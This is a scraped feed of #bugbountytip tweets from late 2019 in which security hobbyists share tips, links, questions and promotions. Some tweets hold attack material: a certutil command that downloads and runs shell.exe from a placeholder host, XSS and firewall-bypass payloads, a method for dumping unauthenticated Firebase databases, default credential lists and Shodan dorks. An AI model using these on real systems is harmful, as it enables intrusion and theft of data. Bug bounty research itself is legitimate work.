0 I just found a bug 🐜 on an Android app using Firebase. I use apktool, then I look for AndroidManifest.xml, I found Firebase there, I look for address in string.xml, I found Firebase database and API keys 🔑 #bugbountytip #bugbountytips #togetherwehitharder

@pouyana1


2019-12-03 21:55:59
3 Of course that James Kettle articles are something else. @albinowax https://t.co/nsTQZFfzMX #bugbountytip #infosecurity #Security #websecurity
haxor_raheem
@HaxorRaheem


2019-12-03 18:31:52
1 Anyone know how to inject a "href" payload in "h1" payload . @Bugcrowd @Hacker0x01 #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-03 18:26:53
9 Exposed Log Files - https://t.co/Kft6p37wJM Exposed Firebase DB - https://t.co/WGzatNLO3C Exposed Github Passwords- https://t.co/sGVY9UloQQ Hacking GraphQL - https://t.co/Z4ZBm3bN82 XSS SVG - https://t.co/5k3dGwkaGA #BugBounty #bugbountytips #bugbountytip #infosec #osint
Sebastian Wieseler
@kickino


2019-12-03 15:30:20
2 Controversial #bugbountytip Schedule meetings with (defence) vendors and learn about their techniques and technologies. Engage with them during product demos and establish a deeper understanding of their products. You can also use “blue” knowledge for “red” approaches or #bugbounty

@pouyana1


2019-12-03 09:42:57
0 bugbounty tips : find hidden HTTP headers and inject them, simple way to reach high risk bugs. #BugBounty #bugbountytips #bugbountytip
Shaurya Sharma
@ShauryaSharma05


2019-12-03 08:39:35
0 I just finished writing a blog and it's a great read for those who are trying their luck in bug bounty "Haven’t founded any bounties yet? Hunt for these vulnerabilities in web applications for a better bounty!" https://t.co/NRSjy03JN5 #bugbounty #hacking #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-12-03 08:28:35
0 #bugbountytip find open prod marathon instances in shodan. - “X-Marathon-Leader” - “ssl:Redacted” “X-Marathon-Leader”
soon
@soon73564093


2019-12-03 06:32:33
1 Bingo xss <3 #bugbounty #bugbountytip https://t.co/d6FilP9MWs
Shoeb Patel
@0xCaptainFreak


2019-12-03 04:08:04
0 I constantly take time out of App Security and learn something else to keep things interesting. System Design and Competitive programming Interests me a lot. 1. https://t.co/SpMqOJ40sE 2. https://t.co/hhWuOhB85V #bugbountytips #bugbountytip
SerWaf
@serialwaffle


2019-12-03 02:24:57
0 Can someone explain to me how the directories work in #hackerone? If I understand correctly, all of the directories are fair game (if I stick to the in-scope items of course). Can I just pick a Co. and start hunting???#bugbounty #bugbountytip @Hacker0x01
Sanketh Sharath
@sharathsanketh


2019-12-03 02:18:19
2 Web application architecture:Principles, protocols and practices by Shklar & Rosen seems to be a great book! It's doing a world of good to me in making me understand how web apps work. Definitely recommended for those getting into bugbounty #bugbountytips #bugbounty #bugbountytip
sudo ls /usr/local/protected 🔴
@AbdulConsole


2019-12-02 23:50:45
0 You don’t want to look at the website from a bird’s eye view and find low hanging fruit i.e, security vulnerabilities without any serious impact. #bughunting #bugbountytip #bugbountytips
Avanish Pathak
@avanish46


2019-12-02 18:33:32
0 Short Note On The $3000 XSS Found On the Public Program on @Bugcrowd #bugbountytip #bugbounty https://t.co/Avh1EW66KA https://t.co/Ef7EW6LwSg
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-02 17:07:17
0 Million Users PII Leak Data Leak Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/XOMt0BJnnn
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-02 17:03:30
0 How I could delete Facebook Ask for Recommendations post’s place objects in comments Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips https://t.co/3jmDgBbzsK
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-02 17:00:08
2 Subdomain Takeover Via Campaignmonitor . Com Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/nmegpRCRSs
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-02 16:58:31
0 Subdomain Takeover Via https://t.co/CYXQhAOtlh https://t.co/nmegpRCRSs Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-02 16:55:23
0 Disable Any Unconfirmed Account in Facebook https://t.co/p2TQTXMYW5 Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-02 16:52:38
0 Prowler: AWS CIS Benchmark Tool https://t.co/TfvuLHUcqN Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt LinkedIn - https://t.co/nhF4SN8Sd5 Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-02 16:48:25
2 Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. https://t.co/ABDslQah52 Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #DevOps
Fisher
@Regala_


2019-12-02 16:28:59
2 I did this super tiny extension a while back that you can now find in the BApp Store. Just go to your Site Map -> Select All -> Right click -> Copy sub domains 🙂 #bugbounty #bugbountytip https://t.co/DiwqY76TUk
ghostlulz
@ghostlulz1337


2019-12-02 15:23:47
0 IT'S CYBER MONDAY. If you're looking to make a living doing bug bounties you may want to get a copy of my book. I'll show you exactly how I operate. This is the last time I'll post this 🙂 https://t.co/zJFRZjg5q2 #bugbountytip #bugbountytips #bugbounty #osint #infosec #dfir https://t.co/VZ8FJPVoIO
Dujunayan
@dujunayan


2019-12-02 15:11:29
0 Google it, this's how make shit done <3 #bugbountytip
%00Termi
@Termi1215


2019-12-02 14:26:50
0 Sometimes i just wonder from where @ippsec has got all the knowledge in the world. Oscp , pentesting , bug bounty,red team just watch his videos. @elonmusk of pentesting world. #bugbounty #bugbountytip
ALL ABOUT HACKER
@AboutHacking


2019-12-02 13:21:30
0 How to start Bug Bounty Read -: https://t.co/b9iplwe1i8 #bugbountytip #bugbounty #bugbountytips #cybersecurity https://t.co/tkIgmb7yBH
🇳🇬Sam-Olayemi
@cykic_


2019-12-02 06:58:32
1 XSS cheat sheet contains many vectors that can help you bypass WAFs and filters #CyberSecurity #bugbountytip https://t.co/HfYpEaiOZ6
securibee 🐝
@securibee


2019-12-02 05:26:50
2 Free course "Automate the Boring Stuff with Python Programming" https://t.co/VfpiAK9jgw #bugbountytip #infosec
Sanketh Sharath
@sharathsanketh


2019-12-02 05:03:25
0 I use the community edition of Burp for bug hunting. It's a great tool, but I am really glad I am investing time learning how to use Zap too. This way I could leverage the features I am missing out on the Burp Pro edition. #bugbounty #bugbountytips #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-01 22:10:28
6 If you are looking to make 🤑money🤑 as a pentester or bug bounty hunter you will want to get a copy of my book. WARNING INDUSTRY SECRETS WILL BE DROPPED!💰💰 https://t.co/zJFRZjg5q2 #bugbountytip #bugbountytips #bugbounty #infosec #redteam #osint #dfir #pentest https://t.co/gmUrqA1tW7
soon
@soon73564093


2019-12-01 18:20:31
3 Xss Go: https://t.co/hIsozDABTH Paste payload: "><script>alert(document.domain)</script> or "><script>alert(document.cookie)</script> @EBHORSMAN #bugbounty #bugbountytip https://t.co/kOp6LxATOV
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-01 18:09:43
1 Subscribe to Our Telegram Channel and Never miss an update on Zero day and New Bug Bounty Tips and Tricks https://t.co/pfl0JWOIqo Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #pentest
Brijesh Shah
@Brijesh1997


2019-12-01 16:44:37
0 URGENT: Best wordlists for fuzzing subdomains required. Found subdomain/assets/6193029F7C344C93BC50CBDBDC9AC91E.xls Need to find what else is exposed publicly. #bugbounty #bugbountytip #bugbountytips
lordsaibat
@lordsaibat


2019-12-01 13:58:37
1 @RealTryHackMe This is a great start into hacking and bug bounties if you are looking. All the rooms give you clear targets to hunt for. #bugbountytip #Hacking #infosec
Brute Logic
@brutelogic


2019-12-01 13:33:23
3 Old #bugbountytip from 5 years ago! https://t.co/7I6aZ5Fo6v
ninetynine
@ninetyn1ne_


2019-12-01 09:49:33
1 Quick tip - If Cross Origin Request allowed only from https://*.target.com, then try finding an XSS on any subdomain of the target, even if they are out of scope, and initiate a CORS request using that XSS. 🤘🤘 #bugbountytip #BugBounty
David Dale
@meathacker


2019-12-01 04:01:02
0 Hearing about IDORs? Not sure what they are? https://t.co/3MEbfcCL4j Great resource! #bugbountytip @Bugcrowd @samhouston
Armin Gojak
@fyoozr


2019-11-30 22:52:18
0 Nice step-by-step walkthrough for finding XSS by @brutelogic https://t.co/A7PsjSLSQQ #bugbounty #bugbountytip
Laszlo Kokai
@kokail


2019-11-30 20:43:11
0 RT @rez0__: Finally took the time to do a write up! Wrote up my first RCE (was also my first critical at that time): https://t.co/76981mCgLk #bugbountytips #bugbountytip There’s some shout-outs in this post to: @healthyoutlet @Michael1026H1 @NahamSec @stokfredrik @TomNomNom
Leonishan
@leonishan_


2019-11-30 19:32:04
3 Exploiting XSS with 20 characters limitation #XSS #bypass #bugbountytip #bugbounty https://t.co/k51H9OkNso
Ammar Amer🇸🇾
@cry__pto


2019-11-30 18:03:10
12 -1-Multiple Ways to Get root through Writable File.pdf: https://t.co/442zfZCBtm -2-CTF Series : Vulnerable Machines.pdf: https://t.co/DJMEurYB0d -3-Red Team Tips.pdf: https://t.co/NAJAIeEsK7 #bugbountytip #redteam #PenTest #Hacking #ctf #cybersecurity #infosec #BugBounty #OSINT
Sebastian Wieseler
@kickino


2019-11-30 05:16:25
1 Btw, my slides from my @div0_sg talk about XSS vulnerabilities are here: https://t.co/X968arapPd Enjoy 🙂 #bugbountytip #bugbountytools #bugbounty #togetherwehitharder
𝚛 𝚎 𝚣 𝟶
@rez0__


2019-11-30 03:14:29
1 Finally took the time to do a write up! Wrote up my first RCE (was also my first critical at that time): https://t.co/37N78DLalr #bugbountytips #bugbountytip There’s some shout-outs in this post to: @healthyoutlet @Michael1026H1 @NahamSec @stokfredrik @TomNomNom
Brijesh Shah
@Brijesh1997


2019-11-29 19:08:04
2 dig A <subdomain> is returning <subdomain> 60 IN SOA https://t.co/SBKgEiAHvQ. https://t.co/UerpKCDxNL 1 7200 900 120960060 Can I take over this subdomain? #bugbounty #bugbountytip #bugbountytips
ALL ABOUT HACKER
@AboutHacking


2019-11-29 18:54:34
0 Cross Site Scripting attack Basic to advance [ part 7]- Basic Burp suite Read:https://t.co/GRACpUbkBi #cybersecurity #cybersec #bugbounty #BugBountyTip #bugbountytips https://t.co/YF94iI795N
Hussein Daher
@HusseiN98D


2019-11-29 18:40:48
0 This was a really hard time for me, I'm back now. Thanks to everyone for your support and all the messages I got. A #bugbountytip will follow soon. Take care
ghostlulz
@ghostlulz1337


2019-11-29 12:55:16
0 Today is BLACK FRIDAY! If you are trying to make a living doing bug bounties you may want to get a copy of my latest book. I show you exactly how I hunt from start to finish. https://t.co/zJFRZjg5q2 #BugBounty #bugbountytips #bugbountytip #BlackFriday2019 #osint #dfir #infosec https://t.co/d1zC3PS0XR
intigriti
@intigriti


2019-11-29 12:38:38
3 🛍️It's also #BlackFriday in #BugBounty land 🛒! Harvest all the coupon codes, try this #BugBountyTip by @quintenvi and score some bounties! 💰 https://t.co/mZnQGkOnF3
Arif Khan
@payloadartist


2019-11-29 06:56:15
0 Nice step-by-step walkthrough for finding XSS by @brutelogic https://t.co/d998DJHlHm #bugbounty #bugbountytip
Ammar Amer🇸🇾
@cry__pto


2019-11-28 23:28:18
7 -Top 40 Best Linux Commands Cheat Sheet. Get It Free Now.pdf: https://t.co/2iKmWinQuN -Complete Google Dorks List in 2019 For Ethical Hacking and Penetration Testing.pdf: https://t.co/hdYVSGNQYs -Blue Team Tips.pdf: https://t.co/lq74aWZo9x #OSINT #bugbountytip #Linux #pentest
bugbountytip
@a_l_e_r_t_1_


2019-11-28 21:05:30
0 Happy Thanksgiving!! Bug bounty tips just 1 $ for 8 hours. Let's go guys. 😂 Let's hack.. https://t.co/JPaA4CKmfO #bugbountytips #bugbountytip https://t.co/ZEIBuwiUDl
bugbountytip
@a_l_e_r_t_1_


2019-11-28 19:29:47
0 Hi guys. Subscribe to my YouTube channel for PoC and tutorial videos.. https://t.co/yyqYNBzlhi #Bugbountytips #Bugbountytip
chaitanya
@chaitanya0888


2019-11-28 19:17:14
3 #bugbounty #bugbountytips #bugbountytip 😂😂😂😂😂😂🤣 So, I got 1year free VPN from @wifimask Thanks to wifimask https://t.co/zLrurx34Zm
Pascal S
@PascalSec


2019-11-28 16:58:06
0 #bugbountytip huge productivity boost needed? Go and check out https://t.co/aZfbzgYuLc in case you use Firefox for testing. This eases multiple account / tenant testing by a mile. Shoutout to @infenet, who showed me this add-on in the first place! 🥳
ईशान सिंह
@R0X4R


2019-11-28 10:24:17
1 Something interesting for Bug Bounty Hunters. #bugbountytips #bugbounty #bugbountytip #bughunter #hacker #hacking https://t.co/sN4tuXtDce
Random Robbie
@Random_Robbie


2019-11-28 09:25:29
3 #bugbountytip when dealing with ysoserial and windows machines get a shell by doing certutil.exe -urlcache -split -f http://yoursite/shell.exe shell.exe & shell.exe Downloads and renames file and then runs it. save messing with powershell struggles.
Hendrik
@hendrikvb


2019-11-27 21:08:43
1 Grab your #pentesting course fix here during super #blackfriday deal at @PentesterLab #infosec #bugbountytip https://t.co/R2M2j9Q3dO
Elsadat
@M0_SADAT


2019-11-27 19:20:34
3 Today I finished my exams and So excited to find P1 after 2 hours of testing at private program found SQL injection😁and while reporting the issue discovered it's Out of scope subdomain💔 #bugbountytip read the target scope carefully to avoid this kind of heartbreaks #bugbounty
Paweł Hałdrzyński
@phaldrzynski


2019-11-27 18:32:50
2 @Hogarth45_ND @plmaltais You can make it even shorter (and get rid of white-space characters): text'/\u0061\u006C\u0065\u0072\u0074`1`// or when slashes are forbidden: text'-\u0061\u006C\u0065\u0072\u0074`1`-' #xss #bugbountytip
Johns
@Johnssimon22


2019-11-27 14:18:10
2 How was i able to access a disabled/hidden feature with the help of burpsuite match and replace feature #bugbountytip #bugbounty https://t.co/q6O93zv2uu
AkaaZaan
@AkaaZaan


2019-11-27 12:07:36
0 infosec people drop links, where I can learn Regex!!! #bugbountytip #bugbounty
bugbountytip
@a_l_e_r_t_1_


2019-11-27 11:55:50
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/sGQVdvW3cY
bugbountytip
@a_l_e_r_t_1_


2019-11-27 10:50:40
0 Party Time for laravel 😅 #bugbountytips #bugbountytip https://t.co/mubsogY68J
ghostlulz
@ghostlulz1337


2019-11-27 05:25:02
9 There are tons of tools for horizontal and vertical domain enumeration. I like to use Amass. In my YouTube video I explain how to effectively use Amass in your reconnaissance process. https://t.co/ysW9JguyCV #bugbounty #bugbountytip #bugbountytips #infosec #amass #redteam
Ammar Amer🇸🇾
@cry__pto


2019-11-26 23:19:33
5 -subscribe to my youtube channel now -advanced videos tutorials about all hacking fields -parrotsec OS is the OS that gonna be used in the courses -learn ethical hacking in detail. https://t.co/m2akiMCaZI #bugbountytip #redteam #pentest #cybersecurity #malware
bugbountytip
@a_l_e_r_t_1_


2019-11-26 19:03:28
0 Look everywhere. Every user input, every parameter, cookies, headers . You can do it. All you need is patience and more reading.. #bugbountytip #bugbountytips https://t.co/Z49RnHRAxC
Vivek Yadav💙 #Scaffold
@viveky259259


2019-11-26 18:40:26
0 Here's one more bug. This time by Spotify. In #payment section. When I choose #UPI as #payment at that time it should ask me #upi id/pin/address not postal pin. @Spotify @spotifyindia @BugBountyHQ #bugbountytip #bug #music #app #AndroidDev #SpotifyPremium https://t.co/HQ3J1V6mrA
ghostlulz
@ghostlulz1337


2019-11-26 18:21:56
8 Seriously, another unauthenticated database. Google Firebase is a ripe target for getting easy wins, just append "/.json" to the URL and it dumps the entire database. More info on my blog: https://t.co/WGzatNLO3C #BugBounty #bugbountytips #bugbountytip #firebase #infosec
Ananda Dhakal
@dhakal_ananda


2019-11-26 15:36:59
1 Feedback from a private program on @Hacker0x01. They had closed the report as N/A because they did not quite get the report. I made sure to provide all the details clearly once again and it is pending resolution. [1/2] #hackerone #bugbounty #bugbountytip https://t.co/kris0pXagG
Üzeyir 👨🏻‍💻
@destanuzeyirr


2019-11-26 12:57:15
0 Does anyone know cookie-based XXE? I may need some help #bugbounty #bugbountytip #togetherwehitharder
Ammar Amer🇸🇾
@cry__pto


2019-11-26 11:28:52
3 -Undetectable C#&C++ Reverse Shells.pdf: https://t.co/08CJhmLAbr -35+ Best Free NMap Tutorials and Courses.pdf: https://t.co/wNd4XNabzv -HTB: Luke.pdf https://t.co/dFYLXTo7zb -How to become a cybersecurity pro.pdf: https://t.co/ODbsUfZpe4 #bugbountytip #hacking #pentest #redteam
Alexander Khovansky
@al_khovansky


2019-11-26 07:50:56
0 *cough* Command-Option-F dangerouslySetInnerHTML *cough* #bugbountytip https://t.co/QScWlAc9Km
tololovejoi
@tolo7010


2019-11-26 00:27:09
2 Your weakness is determined by how do you live with your success. Your strength is determined by how do you handle your difficulties. #motivation #bugbounty #bugbountytip #infosec #hacking #bugbountytips #motivationquotes
Ismayil Tahmazov
@Tismayil1


2019-11-25 21:36:00
0 Sharing is good. Sharing increases happiness. #bugbounty #bugbountytip #bugbountytips #infosec @Nep_1337_1998 https://t.co/VWoZ4xc7cG
Brodie Codie
@brodie_codie


2019-11-25 20:41:20
0 I started doing #bugbounty in Sept, set a goal to reach top 50 in this program... Almost there Tip 2. KEEP READING #movingup #10000Hours #KEEPGOING #perseverance #Bugbountytip #bugbounty @emenalf 👀 https://t.co/YK0XF6uxkb
m0z
@LooseSecurity


2019-11-25 16:42:45
0 Someone just told me they once found company credentials on pastebin. #bugbountytip #bugbounty #bugbountytips #bugbounties #infosec
Security Executions Code
@pwn0sec


2019-11-25 16:35:17
0 Web cache poisoning attack https://t.co/G5ahhQidlh #bugbounty #bugbountytip #bugbountytips #webcache_poisoning_attack
drivertom
@drivertomtt


2019-11-25 16:13:40
0 @Xiaomi #bugbountytips #bugbountytip Never dig ANY vulnerabilities in products that are not admitted by their vendors. https://t.co/MpBnJuVmIh
Security Executions Code
@pwn0sec


2019-11-25 14:46:07
0 Web cache poisoning attack https://t.co/VPiOxCGk3K #bugbounty #bugbountytip #bugbountytips #webcache_poisoning_attack
Wh11teW0lf
@Wh11teW0lf


2019-11-25 11:23:55
5 #bugbountytip Default credentials that i always try: admin:admin test:test admin:password admin:pass [email protected]:test [email protected]:test (try with all domains that belong to company) [email protected]:[email protected],com
Security Executions Code
@pwn0sec


2019-11-25 10:50:26
0 Bug Bounty Panasonic : Reflected (XSS) Vulnerability https://t.co/LnMgHCYvxW #bugbounty #bugbountytip #bugbountytips #xss
Pankaj 🇳🇵🇮🇳 🇷🇺
@Nep_1337_1998


2019-11-25 10:47:48
0 Thank you @Tismayil1 for your notes Yes I was awarded with €600. 😍😍 Tools Sub Scanner : https://t.co/hZCWhAbzEm Dir Scanner : https://t.co/9n9y4T5EXE Git Dumper : https://t.co/7z9cdDA26W #BugBounty #bugbountytips #bugbountytip #whitehat #infosec https://t.co/SLAzoRn8Nz
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-11-25 08:13:46
0 Look out the window...if that’s not your dream view...get back to work! #bugbountytip
nutronex
@nutronex


2019-11-25 07:12:48
0 LFI (cannot use log poison) > download source codes > found database credentials > found hidden admin panel > tried to login admin panel with these credentials > success > file upload > RCE #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-11-25 06:07:56
0 Cool video about vim 😀 #bugbountytip https://t.co/tBsAbNk3UO
ninetynine
@ninetyn1ne_


2019-11-25 04:43:27
0 Quick tip - If '/something' => 403 Try - '/something/' '/something/%20' '/something.html' '/something.json' '/something/?anything' '/something#' Works sometimes🤘 Happy hacking....!!! #bugbounty #bugbountytip
Mashoud1122
@mashoud1122


2019-11-24 21:42:23
1 I just published my 1st Write UP.Writing it was harder than I thought. here you go: CORS Misconfiguration ->Account TakeOver [Out of scope to grab items In-Scope] #BugBounty #BugBountyTip #BugBountyTips https://t.co/6Ke09g37L5
Nosense
@Nosense08537389


2019-11-24 19:57:15
1 Hello friends! I'm trying the exploit 44298 with kernel 4.4.0-87 and Ubuntu 16.04.3 but when I run it, it gives me invalid argument. Can someone help me with what I should do? #bugbounty #hackthebox #PenTest #bountybug #bugbountytip #CyberSecurity #Hacking
👻in🐚
@0xerror


2019-11-24 19:09:39
3 XSS News: @spyerror: 'Cloudflare {XSS} «byPass detection» `payload´; %3Cimg src='null' onerror=alert('spyerror')%3E 🏆 #BugBounty #BugBountyTip #WAF #infosec ' https://t.co/XopkzOyBE8, see more https://t.co/4VACxHYGGn
BlackClover
@Bc10ver


2019-11-24 19:09:39
2 Top story: @spyerror: 'Cloudflare {XSS} «byPass detection» `payload´; %3Cimg src='null' onerror=alert('spyerror')%3E 🏆 #BugBounty #BugBountyTip #WAF #infosec ' https://t.co/mW90LakWPL, see more https://t.co/fVnXn9Z0FJ
Pratik Yadav
@PratikY9967


2019-11-24 17:31:01
8 SSTI while sending money from one account to another. I inserted a normal payload {{7*7}} in the note section. Probably others have missed this bug because no one wants to spend a small amount for testing. #bugbounty #bugbountytip https://t.co/k4dq1Xa3Tn
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 台風
@spyerror


2019-11-24 13:24:05
6 Cloudflare {XSS} «byPass detection» `payload´; %3Cimg src='null' onerror=alert('spyerror')%3E 🏆 #BugBounty #BugBountyTip #WAF #infosec https://t.co/oHTNwiv6Au
ghostlulz
@ghostlulz1337


2019-11-24 13:21:21
9 If you're wanting to become a full time bug bounty hunter or penetration tester you may want to get a copy of my book. WARNING INDUSTRY SECRETS WILL BE DROPPED. https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytip #infosec #appsec #redteam #PenTest #DFIR #OSINT #xss https://t.co/iBiJBKWwPU
vinod3070
@vinod3070


2019-11-24 11:37:41
0 It's a project management tool, if I put my vps link in the group chat box I get GET req to my VPS. Nothing else is working. Any leads ? #bugbountytips #bugbountytip #hackerone #recon #ssrf
luis madero
@_Y000_


2019-11-24 00:27:50
3 Exploiting a CORS (cross-origin resource sharing) vulnerability. #hacked #cors #bugbountytip #bugbounty #CyberSecurity https://t.co/vWzRICB3T1
Shammah Agwor
@Zealsham


2019-11-23 23:01:26
0 Search shodan for “aquatone_report.html” get access to dozen of recon data from other bug hunters 😂😂. #Bugbountytip #bugbounty
Halil AHMAD
@Halilahmadd


2019-11-23 21:39:11
4 Cloudflare Bypass Payload:<svg onload=prompt%26%230000000040document.domain)> Hex: <svg onload=prompt%26%23x000000028;document.domain)> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security @XssPayloads
healthyoutlet
@healthyoutlet


2019-11-23 20:49:38
0 Get all the urls out of a sitemap.xml with curl and xmllint in a bash oneliner. curl -s https://t.co/A6bYnXdhNI | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g' #bugbountytip
ticarpi
@ticarpi


2019-11-23 20:40:15
3 jwt_tool v1.3.2 now has improved 'Spoof JWKS' functionality https://t.co/yA6KVOSEqO #jwt #jwks #bugbountytip #netsec https://t.co/uH8H4LwB9J
Pavandeep
@Pavandep8


2019-11-23 15:43:20
0 Look what I shared: SQL Injection Step By Step Part 1 - Nilesh Sanyal - Medium @MIUI| #bugbountytip #Hacker #security https://t.co/deek38JH50
Nick || hunt4p1zza
@ngkogkos


2019-11-23 15:08:38
6 Burp has many features to help your workflow & better -> more bugs. In my @Burp_Suite proxy, I constantly use a search regex pattern that includes standard placeholders I use within my payloads, such as zzz/xss, and I keep adding to it. #burpsuitetip #bugbountytip #BugBounty https://t.co/3CHDtFGQeF
Paresh
@Paresh_parmar1


2019-11-23 10:10:04
8 #bugbountytip Decompile the Android app and go to: Resources > resources.arsc > res > values > strings.xml. Search for *.firebaseio.com in the XML file, then open a browser and try https://*.firebaseio.com/.json; you might find read access to the database there. #bugbountytips https://t.co/eZPSqnAbWV
ninetynine
@ninetyn1ne_


2019-11-23 08:24:59
0 XSS tip - when looking for XSS, try functions like - 'confirm()' and 'eval()' instead of 'alert()' & 'prompt()' to bypass the WAF. 🧐 #bugbountytip #BugBounty
ghostlulz
@ghostlulz1337


2019-11-23 07:08:39
9 Expanding your scope on a bug bounty program is a great way to gain more vulnerabilities.Horizontal domain enumeration is a technique used to find domains of an organization. More information on my youtube video: https://t.co/nrVeAWSmxV #bugbountytip #BugBounty #bugbountytips
HackIsOn ®
@hackison


2019-11-23 04:44:08
13 Everytime shodan gives a surprise to our #cybersecurity community 😎😎 Utilise it everyone 🤗 #BugBounty #bugbountytip #bugbountytips #hacking #cybersecurity #linux #Ubuntu #hacking #hackers #owasp #bug #vulnerability #redteam #redteaming https://t.co/XAYGEChP7d
Ammar Amer🇸🇾
@cry__pto


2019-11-22 19:13:56
15 -Web Application Penetration Testing Course.pdf: https://t.co/GlebM7I7b0 -20 Best HTML Cheat Sheet Of 2019 | With All New HTML5 Tags.pdf: https://t.co/59tuOLtNSb -Fasten your Recon process using Shell Scripting.pdf: https://t.co/33JZAQ2k4n #html #Hacking #bugbountytip #PenTest
healthyoutlet
@healthyoutlet


2019-11-22 18:41:00
0 1) Find as many domains as you can that are owned by the target org: https://t.co/sTkppJra4w 2) run subdomain discovery on all of them 3) make a wordlist of all discovered subdomains 4) run massdns on in scope domains with that wordlist. #bugbountytip
florens
@florens25301329


2019-11-22 17:27:55
0 Need some help to exploit DOM-XSS will share bounty! #BugBounty #bugbountytip #togetherwehitharder
Yash sariya
@stylish_hacker_


2019-11-22 08:33:44
0 How to become a successful bug hunter https://t.co/nYs8qifcA0 #bugbounty #bugbountytip #bugbountytips
Yash sariya
@stylish_hacker_


2019-11-22 08:32:27
0 What is web server fingerprint https://t.co/BdmKPXFPpd #bugbounty #bugbountytip #bugbountytips
Yash sariya
@stylish_hacker_


2019-11-22 08:26:59
0 Complete Recon Process A to z https://t.co/msMzOd0Ja7 #bugbountytip #bugbounty #bugbountytips
Udit Bhadauria
@udit_thakkur


2019-11-22 06:59:54
0 @NahamSec just uploaded his talk at @defcon "Owning The Clout Through SSRF" with @daeken! https://t.co/jb7XuGIXyN The pdf can be found: https://t.co/R7gbIXgItf & if you want to practice it, consider looking into @PentesterLab's exercise of brown badge. #infosec #bugbountytip
Brodie Codie
@brodie_codie


2019-11-22 05:04:54
0 So aquatone has its own probe to check if links are alive with this option. Found 2 admin panels this way: "cat List.txt| aquatone -ports xlarge" #bugbountytips #bugbountytip
Securisec 🚀
@securisec


2019-11-22 01:33:31
0 "RT RT Tismayil1: Yes I earned $3180. Tools : Sub Scanner : https://t.co/VcdATHEpOs Dir Scanner : https://t.co/HJAwQE187M Git Dumper : https://t.co/ZKqKYdHhkG #BugBounty #bugbountytips #bugbountytip #whitehat #infosec https://t.co/UGa0yAvGEx"
healthyoutlet
@healthyoutlet


2019-11-21 23:14:43
0 #bugbountytip keep your hackerone inbox open so that it's super easy to check for updates on that crit every 15 minutes for the next week. Bonus tip: Have a pint of ben and jerry's ready for when it gets marked dupe.
Binit Ghimire
@WHOISbinit


2019-11-21 19:51:51
1 When you are using an XSS payload in the email field during registration and it doesn't execute after creating the account, try choosing the "Resend Activation Email" option. Developers are likely to forget filtering the email in activation email resent message. #XSS #BugBountyTip
Ismayil Tahmazov
@Tismayil1


2019-11-21 19:03:42
18 Yes I earned $3180. Tools : Sub Scanner : https://t.co/LegySAU3sZ Dir Scanner : https://t.co/1L6MutcaEc Git Dumper : https://t.co/IOsHlTWCP2 #BugBounty #bugbountytips #bugbountytip #whitehat #infosec https://t.co/6Qy1JEiDWM
Vikash Chaudhary
@OffensiveHunter


2019-11-21 05:31:42
2 #BugBountyTip Complete the first checklist that I gave you yesterday, now move on to these vulnerabilities; spend some time reading about these topics. If you want to learn live bug bounty hunting you can subscribe to my second course i.e Offensive…https://t.co/ji3V0Sxi5a
Mourad
@SecuAudit


2019-11-20 22:27:32
0 The worst Bug Bounty program: You spend your holidays trying to help them to secure their online business. After 45 days, when you ask for an update, they just get worse and treat you like shit in return. Bug Hunters have no value in this chain #bugbountytip #BugBounty #pentesting
florens
@florens25301329


2019-11-20 20:18:04
2 Finally got the last bit working so i can finish the practical for XXE!! Notes will be available today/tomorrow! #bugbountytip #Bugbounty
itsmenaga
@nagarockshard


2019-11-20 17:17:24
